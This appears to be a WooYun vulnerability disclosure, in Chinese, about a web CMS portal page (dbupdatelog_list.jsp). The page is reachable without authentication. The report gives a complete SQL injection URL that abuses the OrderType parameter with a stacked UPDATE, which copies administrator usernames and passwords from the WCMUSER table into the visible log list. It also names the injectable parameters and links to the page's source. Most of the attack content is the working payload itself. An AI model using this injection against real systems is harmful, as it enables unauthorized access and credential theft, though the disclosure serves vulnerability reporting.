更新时间:2022-09-11 21:13:28
来源http://www.wooyun.org/bugs/wooyun-2013-019753
首先是这个页面,好像是越权了
http://xxxx/portal/db/dbupdatelog_list.jsp
正常应该要登陆才能看吧?
直接注入
http://xx/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
注:存在注入参数为:OrderType 和 OrderField
即把查询记录显示在结果里,要是没有记录,可以自己加一条
http://xxxxx/portal/db/dbupdatelog_addedit.jsp
另,源码在这里存在:
http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp